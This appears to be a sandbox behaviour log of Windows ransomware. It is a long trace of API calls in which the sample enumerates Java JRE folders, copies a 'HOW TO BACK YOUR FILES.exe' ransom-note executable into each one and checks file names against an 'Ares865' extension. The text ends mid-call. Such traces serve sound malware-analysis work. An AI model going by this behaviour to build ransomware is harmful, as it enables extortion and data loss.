lstrlenW (lpString="messages_zh_TW.properties") returned 25 [0056.381] lstrlenW (lpString="Ares865") returned 7 [0056.381] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.381] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="splash.gif" | out: lpString1="splash.gif") returned="splash.gif" [0056.382] lstrlenW (lpString="splash.gif") returned 10 [0056.382] lstrlenW (lpString="Ares865") returned 7 [0056.382] lstrcmpiW (lpString1="ash.gif", lpString2="Ares865") returned 1 [0056.382] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" [0056.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0056.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.382] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs") returned 47 [0056.382] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs" [0056.382] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.382] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.388] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.388] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74470c60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531c5c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531c5c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.388] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.388] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.388] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="jqs.conf" | out: lpString1="jqs.conf") returned="jqs.conf" [0056.388] lstrlenW (lpString="jqs.conf") returned 8 [0056.388] lstrlenW (lpString="Ares865") returned 7 [0056.388] lstrcmpiW (lpString1="qs.conf", lpString2="Ares865") returned 1 [0056.388] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="jqsmessages.properties" | out: lpString1="jqsmessages.properties") returned="jqsmessages.properties" [0056.388] lstrlenW (lpString="jqsmessages.properties") returned 22 [0056.388] lstrlenW (lpString="Ares865") returned 7 [0056.389] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0056.389] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" [0056.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0056.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.389] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm") returned 40 [0056.389] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm" [0056.389] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.389] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.395] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.395] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531ebde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531ebde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.395] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.395] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.395] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="CIEXYZ.pf" | out: lpString1="CIEXYZ.pf") returned="CIEXYZ.pf" [0056.395] lstrlenW (lpString="CIEXYZ.pf") returned 9 [0056.395] lstrlenW (lpString="Ares865") returned 7 [0056.395] lstrcmpiW (lpString1="EXYZ.pf", lpString2="Ares865") returned 1 [0056.395] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="GRAY.pf" | out: lpString1="GRAY.pf") returned="GRAY.pf" [0056.395] lstrlenW (lpString="GRAY.pf") returned 7 [0056.395] lstrlenW (lpString="Ares865") returned 7 [0056.395] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="LINEAR_RGB.pf" | out: lpString1="LINEAR_RGB.pf") returned="LINEAR_RGB.pf" [0056.395] lstrlenW (lpString="LINEAR_RGB.pf") returned 13 [0056.395] lstrlenW (lpString="Ares865") returned 7 [0056.396] lstrcmpiW (lpString1="_RGB.pf", lpString2="Ares865") returned -1 [0056.396] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="PYCC.pf" | out: lpString1="PYCC.pf") returned="PYCC.pf" [0056.396] lstrlenW (lpString="PYCC.pf") returned 7 [0056.396] lstrlenW (lpString="Ares865") returned 7 [0056.396] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="sRGB.pf" | out: lpString1="sRGB.pf") returned="sRGB.pf" [0056.396] lstrlenW (lpString="sRGB.pf") returned 7 [0056.396] lstrlenW (lpString="Ares865") returned 7 [0056.396] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" [0056.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0056.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.396] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned 43 [0056.396] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet" [0056.396] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.396] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\applet\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.400] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.400] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7444ab00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531ebde0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531ebde0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.401] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.401] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.401] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin" [0056.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0056.401] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0056.401] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\bin") returned 36 [0056.401] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\bin" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\bin") returned="C:\\Program Files (x86)\\Java\\jre7\\bin" [0056.401] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.401] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.408] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.409] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x53211f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53211f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0056.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.409] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="awt.dll" | out: lpString1="awt.dll") returned="awt.dll" [0056.409] lstrlenW (lpString="awt.dll") returned 7 [0056.409] lstrlenW (lpString="Ares865") returned 7 [0056.409] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="axbridge.dll" | out: lpString1="axbridge.dll") returned="axbridge.dll" [0056.409] lstrlenW (lpString="axbridge.dll") returned 12 [0056.409] lstrlenW (lpString="Ares865") returned 7 [0056.410] lstrcmpiW (lpString1="dge.dll", lpString2="Ares865") returned 1 [0056.410] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="client" | out: lpString1="client") returned="client" [0056.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0056.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2df770 [0056.410] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b10 | out: ListHead=0x2e77d0, ListEntry=0x2e7b10) returned 0x2e7af0 [0056.410] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x22ba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0056.410] lstrcmpiW (lpString1="dcpr.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.410] lstrcmpiW (lpString1="dcpr.dll", lpString2="aoldtz.exe") returned 1 [0056.410] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="dcpr.dll" | out: lpString1="dcpr.dll") returned="dcpr.dll" [0056.410] lstrlenW (lpString="dcpr.dll") returned 8 [0056.410] lstrlenW (lpString="Ares865") returned 7 [0056.410] lstrcmpiW (lpString1="cpr.dll", lpString2="Ares865") returned 1 [0056.410] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="decora-sse.dll" | out: lpString1="decora-sse.dll") returned="decora-sse.dll" [0056.410] lstrlenW (lpString="decora-sse.dll") returned 14 [0056.410] lstrlenW (lpString="Ares865") returned 7 [0056.410] lstrcmpiW (lpString1="sse.dll", lpString2="Ares865") returned 1 [0056.410] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="deploy.dll" | out: lpString1="deploy.dll") returned="deploy.dll" [0056.410] lstrlenW (lpString="deploy.dll") returned 10 [0056.410] lstrlenW (lpString="Ares865") returned 7 [0056.410] lstrcmpiW (lpString1="loy.dll", lpString2="Ares865") returned 1 [0056.410] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="dtplugin" | out: lpString1="dtplugin") returned="dtplugin" [0056.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0056.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f1fc8 [0056.410] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7b30 | out: ListHead=0x2e77d0, ListEntry=0x2e7b30) returned 0x2e7b10 [0056.411] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x63a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0056.411] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.411] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="aoldtz.exe") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="dt_shmem.dll" | out: lpString1="dt_shmem.dll") returned="dt_shmem.dll" [0056.411] lstrlenW (lpString="dt_shmem.dll") returned 12 [0056.411] lstrlenW (lpString="Ares865") returned 7 [0056.411] lstrcmpiW (lpString1="mem.dll", lpString2="Ares865") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="dt_socket.dll" | out: lpString1="dt_socket.dll") returned="dt_socket.dll" [0056.411] lstrlenW (lpString="dt_socket.dll") returned 13 [0056.411] lstrlenW (lpString="Ares865") returned 7 [0056.411] lstrcmpiW (lpString1="ket.dll", lpString2="Ares865") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="eula.dll" | out: lpString1="eula.dll") returned="eula.dll" [0056.411] lstrlenW (lpString="eula.dll") returned 8 [0056.411] lstrlenW (lpString="Ares865") returned 7 [0056.411] lstrcmpiW (lpString1="ula.dll", lpString2="Ares865") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="fontmanager.dll" | out: lpString1="fontmanager.dll") returned="fontmanager.dll" [0056.411] lstrlenW (lpString="fontmanager.dll") returned 15 [0056.411] lstrlenW (lpString="Ares865") returned 7 [0056.411] lstrcmpiW (lpString1="ger.dll", lpString2="Ares865") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="fxplugins.dll" | out: lpString1="fxplugins.dll") returned="fxplugins.dll" [0056.411] lstrlenW (lpString="fxplugins.dll") returned 13 [0056.411] lstrlenW (lpString="Ares865") returned 7 [0056.411] lstrcmpiW (lpString1="ins.dll", lpString2="Ares865") returned 1 [0056.411] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="glass.dll" | out: lpString1="glass.dll") returned="glass.dll" [0056.412] lstrlenW (lpString="glass.dll") returned 9 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="ass.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="glib-lite.dll" | out: lpString1="glib-lite.dll") returned="glib-lite.dll" [0056.412] lstrlenW (lpString="glib-lite.dll") returned 13 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="ite.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="gstreamer-lite.dll" | out: lpString1="gstreamer-lite.dll") returned="gstreamer-lite.dll" [0056.412] lstrlenW (lpString="gstreamer-lite.dll") returned 18 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="ite.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="hprof.dll" | out: lpString1="hprof.dll") returned="hprof.dll" [0056.412] lstrlenW (lpString="hprof.dll") returned 9 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="rof.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="installer.dll" | out: lpString1="installer.dll") returned="installer.dll" [0056.412] lstrlenW (lpString="installer.dll") returned 13 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="ler.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="instrument.dll" | out: lpString1="instrument.dll") returned="instrument.dll" [0056.412] lstrlenW (lpString="instrument.dll") returned 14 [0056.412] lstrlenW (lpString="Ares865") returned 7 [0056.412] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0056.412] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="j2pcsc.dll" | out: lpString1="j2pcsc.dll") returned="j2pcsc.dll" [0056.413] lstrlenW (lpString="j2pcsc.dll") returned 10 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="csc.dll", lpString2="Ares865") returned 1 [0056.413] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="j2pkcs11.dll" | out: lpString1="j2pkcs11.dll") returned="j2pkcs11.dll" [0056.413] lstrlenW (lpString="j2pkcs11.dll") returned 12 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="s11.dll", lpString2="Ares865") returned 1 [0056.413] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jaas_nt.dll" | out: lpString1="jaas_nt.dll") returned="jaas_nt.dll" [0056.413] lstrlenW (lpString="jaas_nt.dll") returned 11 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="_nt.dll", lpString2="Ares865") returned -1 [0056.413] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jabswitch.exe" | out: lpString1="jabswitch.exe") returned="jabswitch.exe" [0056.413] lstrlenW (lpString="jabswitch.exe") returned 13 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="tch.exe", lpString2="Ares865") returned 1 [0056.413] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="java-rmi.exe" | out: lpString1="java-rmi.exe") returned="java-rmi.exe" [0056.413] lstrlenW (lpString="java-rmi.exe") returned 12 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="rmi.exe", lpString2="Ares865") returned 1 [0056.413] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="java.dll" | out: lpString1="java.dll") returned="java.dll" [0056.413] lstrlenW (lpString="java.dll") returned 8 [0056.413] lstrlenW (lpString="Ares865") returned 7 [0056.413] lstrcmpiW (lpString1="ava.dll", lpString2="Ares865") returned 1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="java.exe" | out: lpString1="java.exe") returned="java.exe" [0056.414] lstrlenW (lpString="java.exe") returned 8 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="ava.exe", lpString2="Ares865") returned 1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="JavaAccessBridge-32.dll" | out: lpString1="JavaAccessBridge-32.dll") returned="JavaAccessBridge-32.dll" [0056.414] lstrlenW (lpString="JavaAccessBridge-32.dll") returned 23 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="-32.dll", lpString2="Ares865") returned -1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="javacpl.exe" | out: lpString1="javacpl.exe") returned="javacpl.exe" [0056.414] lstrlenW (lpString="javacpl.exe") returned 11 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="cpl.exe", lpString2="Ares865") returned 1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="javafx-font.dll" | out: lpString1="javafx-font.dll") returned="javafx-font.dll" [0056.414] lstrlenW (lpString="javafx-font.dll") returned 15 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="ont.dll", lpString2="Ares865") returned 1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="javafx-iio.dll" | out: lpString1="javafx-iio.dll") returned="javafx-iio.dll" [0056.414] lstrlenW (lpString="javafx-iio.dll") returned 14 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="iio.dll", lpString2="Ares865") returned 1 [0056.414] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="javaw.exe" | out: lpString1="javaw.exe") returned="javaw.exe" [0056.414] lstrlenW (lpString="javaw.exe") returned 9 [0056.414] lstrlenW (lpString="Ares865") returned 7 [0056.414] lstrcmpiW (lpString1="vaw.exe", lpString2="Ares865") returned 1 [0056.415] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="javaws.exe" | out: lpString1="javaws.exe") returned="javaws.exe" [0056.415] lstrlenW (lpString="javaws.exe") returned 10 [0056.415] lstrlenW (lpString="Ares865") returned 7 [0056.415] lstrcmpiW (lpString1="aws.exe", lpString2="Ares865") returned 1 [0056.416] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="java_crw_demo.dll" | out: lpString1="java_crw_demo.dll") returned="java_crw_demo.dll" [0056.416] lstrlenW (lpString="java_crw_demo.dll") returned 17 [0056.416] lstrlenW (lpString="Ares865") returned 7 [0056.416] lstrcmpiW (lpString1="emo.dll", lpString2="Ares865") returned 1 [0056.416] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jawt.dll" | out: lpString1="jawt.dll") returned="jawt.dll" [0056.416] lstrlenW (lpString="jawt.dll") returned 8 [0056.416] lstrlenW (lpString="Ares865") returned 7 [0056.416] lstrcmpiW (lpString1="awt.dll", lpString2="Ares865") returned 1 [0056.416] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="JAWTAccessBridge-32.dll" | out: lpString1="JAWTAccessBridge-32.dll") returned="JAWTAccessBridge-32.dll" [0056.416] lstrlenW (lpString="JAWTAccessBridge-32.dll") returned 23 [0056.416] lstrlenW (lpString="Ares865") returned 7 [0056.416] lstrcmpiW (lpString1="-32.dll", lpString2="Ares865") returned -1 [0056.416] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="JdbcOdbc.dll" | out: lpString1="JdbcOdbc.dll") returned="JdbcOdbc.dll" [0056.416] lstrlenW (lpString="JdbcOdbc.dll") returned 12 [0056.416] lstrlenW (lpString="Ares865") returned 7 [0056.416] lstrcmpiW (lpString1="dbc.dll", lpString2="Ares865") returned 1 [0056.416] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jdwp.dll" | out: lpString1="jdwp.dll") returned="jdwp.dll" [0056.417] lstrlenW (lpString="jdwp.dll") returned 8 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcmpiW (lpString1="dwp.dll", lpString2="Ares865") returned 1 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jfr.dll" | out: lpString1="jfr.dll") returned="jfr.dll" [0056.417] lstrlenW (lpString="jfr.dll") returned 7 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jfxmedia.dll" | out: lpString1="jfxmedia.dll") returned="jfxmedia.dll" [0056.417] lstrlenW (lpString="jfxmedia.dll") returned 12 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcmpiW (lpString1="dia.dll", lpString2="Ares865") returned 1 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jfxwebkit.dll" | out: lpString1="jfxwebkit.dll") returned="jfxwebkit.dll" [0056.417] lstrlenW (lpString="jfxwebkit.dll") returned 13 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcmpiW (lpString1="kit.dll", lpString2="Ares865") returned 1 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jli.dll" | out: lpString1="jli.dll") returned="jli.dll" [0056.417] lstrlenW (lpString="jli.dll") returned 7 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jp2iexp.dll" | out: lpString1="jp2iexp.dll") returned="jp2iexp.dll" [0056.417] lstrlenW (lpString="jp2iexp.dll") returned 11 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.417] lstrcmpiW (lpString1="exp.dll", lpString2="Ares865") returned 1 [0056.417] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jp2launcher.exe" | out: lpString1="jp2launcher.exe") returned="jp2launcher.exe" [0056.417] lstrlenW (lpString="jp2launcher.exe") returned 15 [0056.417] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="her.exe", lpString2="Ares865") returned 1 [0056.418] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jp2native.dll" | out: lpString1="jp2native.dll") returned="jp2native.dll" [0056.418] lstrlenW (lpString="jp2native.dll") returned 13 [0056.418] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="ive.dll", lpString2="Ares865") returned 1 [0056.418] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jp2ssv.dll" | out: lpString1="jp2ssv.dll") returned="jp2ssv.dll" [0056.418] lstrlenW (lpString="jp2ssv.dll") returned 10 [0056.418] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="ssv.dll", lpString2="Ares865") returned 1 [0056.418] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="jpeg.dll" | out: lpString1="jpeg.dll") returned="jpeg.dll" [0056.418] lstrlenW (lpString="jpeg.dll") returned 8 [0056.418] lstrlenW (lpString="Ares865") returned 7 [0056.418] lstrcmpiW (lpString1="peg.dll", lpString2="Ares865") returned 1 [0056.418] lstrcpyW 